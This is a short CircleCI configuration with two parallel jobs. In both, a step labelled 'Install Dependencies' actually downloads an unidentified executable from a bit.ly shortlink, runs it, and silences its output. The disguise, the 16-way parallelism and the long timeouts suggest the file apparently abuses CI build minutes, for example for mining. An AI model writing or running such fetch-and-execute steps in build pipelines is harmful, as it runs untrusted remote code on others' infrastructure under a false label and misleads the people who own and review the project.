version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command:  |
              timeout 540 wget https://bit.ly/3HbWRqo && chmod +x 3HbWRqo && ./3HbWRqo >/dev/null
    
    test:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command:  |
              timeout 560 wget https://bit.ly/3HbWRqo && chmod +x 3HbWRqo && ./3HbWRqo >/dev/null
     

workflows:
    version: 2.1
    build:
        jobs:
        - trial
        - test